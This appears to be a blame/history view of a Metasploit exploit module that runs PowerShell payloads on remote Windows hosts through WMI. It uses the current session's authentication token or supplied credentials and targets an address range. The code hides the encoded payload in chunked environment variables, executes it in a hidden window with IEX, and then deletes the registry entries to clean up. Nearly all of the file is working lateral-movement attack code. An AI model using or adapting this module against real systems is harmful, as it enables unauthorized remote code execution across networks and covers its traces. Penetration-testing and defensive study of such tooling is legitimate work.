metasploit-framework/modules/exploits/windows/local/wmi.rb

164 lines
5.0 KiB
Ruby
Raw Normal View History

2013-09-20 12:40:28 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
2013-10-30 20:14:16 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
2013-09-20 12:40:28 +00:00
##
require 'msf/core'
require 'msf/core/exploit/powershell'
2013-09-20 12:40:28 +00:00
require 'rex'
class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Exploit::Powershell
2013-12-14 20:05:51 +00:00
include Msf::Post::Windows::WMIC
2013-09-20 12:40:28 +00:00
def initialize(info={})
super( update_info( info,
2013-09-20 16:18:14 +00:00
'Name' => 'Windows Management Instrumentation (WMI) Remote Command Execution',
2013-09-20 12:40:28 +00:00
'Description' => %q{
2013-09-20 16:18:14 +00:00
This module executes powershell on the remote host using the current
user credentials or those supplied. Instead of using PSEXEC over TCP
port 445 we use the WMIC command to start a Remote Procedure Call on
2013-09-20 17:36:24 +00:00
TCP port 135 and an ephemeral port. Set ReverseListenerComm to tunnel
traffic through that session.
2013-09-20 12:40:28 +00:00
The result is similar to psexec but with the added benefit of using
the session's current authentication token instead of having to know
a password or hash.
2013-09-20 16:18:14 +00:00
2014-12-04 20:17:48 +00:00
The remote host must be configured to allow remote Windows Management
Instrumentation.
2013-09-20 12:40:28 +00:00
},
'License' => MSF_LICENSE,
'Author' => [
'Ben Campbell'
2013-09-20 12:40:28 +00:00
],
2013-09-20 16:18:14 +00:00
'References' =>
[
2013-09-20 12:40:28 +00:00
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
[ 'OSVDB', '3106'],
2013-09-20 16:18:14 +00:00
[ 'URL', 'http://passing-the-hash.blogspot.co.uk/2013/07/WMIS-PowerSploit-Shells.html' ],
2013-09-20 12:40:28 +00:00
],
2013-09-20 16:18:14 +00:00
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'WfsDelay' => '15',
},
2013-09-20 12:40:28 +00:00
'DisclosureDate' => 'Jan 01 1999',
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
2014-04-22 13:28:27 +00:00
'Targets' =>
2013-09-20 12:40:28 +00:00
[
2014-04-22 13:28:27 +00:00
[ 'Automatic', { 'Arch' => [ARCH_X86, ARCH_X86_64] } ],
2013-09-20 12:40:28 +00:00
],
'DefaultTarget' => 0
))
register_options([
2013-09-20 16:18:14 +00:00
OptAddressRange.new("RHOSTS", [ true, "Target address range or CIDR identifier" ]),
2013-09-20 17:36:24 +00:00
# Move this out of advanced
OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener'])
2013-09-20 12:40:28 +00:00
])
2013-12-14 20:05:51 +00:00
deregister_options("RHOST")
2013-09-20 12:40:28 +00:00
end
def exploit
2013-09-20 16:18:14 +00:00
if datastore['SMBUser'] and datastore['SMBPass'].nil?
fail_with(Failure::BadConfig, "Need both username and password set.")
end
Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
2013-12-14 20:05:51 +00:00
run_host(server)
end
end
2013-09-20 18:33:27 +00:00
2013-12-14 20:05:51 +00:00
def run_host(server)
2014-12-04 20:17:48 +00:00
if load_extapi
psh_options = { :remove_comspec => true,
:encode_final_payload => true }
else
psh_options = { :remove_comspec => true,
:encode_inner_payload => true,
:use_single_quotes => true }
end
2014-12-04 20:24:37 +00:00
psh = cmd_psh_payload(payload.encoded,
payload_instance.arch.first,
2014-12-04 20:17:48 +00:00
psh_options)
2013-12-14 20:05:51 +00:00
begin
2014-12-04 20:17:48 +00:00
if load_extapi
exec_cmd = psh
else
2014-12-04 20:24:37 +00:00
# Get the PSH Payload and split it into bitesize chunks
# 1024 appears to be the max value allowed in env vars
2014-12-04 20:17:48 +00:00
print_status("[#{server}] Storing payload in environment variables")
chunks = split_code(psh, 1000)
env_name = rand_text_alpha(rand(3)+3)
env_vars = []
0.upto(chunks.length-1) do |i|
env_vars << "#{env_name}#{i}"
c = "cmd /c SETX #{env_vars[i]} \"#{chunks[i]}\" /m"
result = wmic_command(c, server)
unless result
print_error("[#{server}] WMIC command error - skipping host")
return false
end
2013-09-20 18:33:27 +00:00
end
2014-12-04 20:17:48 +00:00
x = rand_text_alpha(rand(3)+3)
exec_cmd = generate_psh_command_line({
:noprofile => true,
:windowstyle => 'hidden',
:command => "$#{x}=''"
})
env_vars.each do |env|
exec_cmd << "+$env:#{env}"
end
exec_cmd << ";IEX $#{x};"
2013-09-20 16:18:14 +00:00
end
2013-12-14 20:05:51 +00:00
print_status("[#{server}] Executing payload")
result = wmic_command(exec_cmd, server)
2013-09-20 18:33:27 +00:00
2013-12-14 20:05:51 +00:00
if result
if result[:return] == 0
print_good("[#{server}] Process Started PID: #{result[:pid]}")
else
print_error("[#{server}] failed, Return Value: #{result[:return]})")
2013-09-20 18:33:27 +00:00
end
2013-09-20 16:18:14 +00:00
else
2013-12-14 20:05:51 +00:00
print_error("[#{server}] failed...)")
2013-09-20 16:18:14 +00:00
end
2014-12-04 20:17:48 +00:00
unless load_extapi
print_status("[#{server}] Cleaning up environment variables")
env_vars.each do |env|
cleanup_cmd = "cmd /c REG delete \"HKLM\\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /V #{env} /f"
wmic_command(cleanup_cmd, server)
end
2013-12-14 20:05:51 +00:00
end
rescue Rex::Post::Meterpreter::RequestError => e
print_error("[#{server}] Error moving on... #{e}")
return false
2014-04-22 13:28:27 +00:00
ensure
Rex::sleep(2)
2013-12-14 20:05:51 +00:00
end
2013-09-20 16:18:14 +00:00
end
def split_code(psh, chunk_size)
array = []
idx = 0
while (idx < psh.length)
array << psh[idx, chunk_size]
idx += chunk_size
end
return array
2013-09-20 12:40:28 +00:00
end
end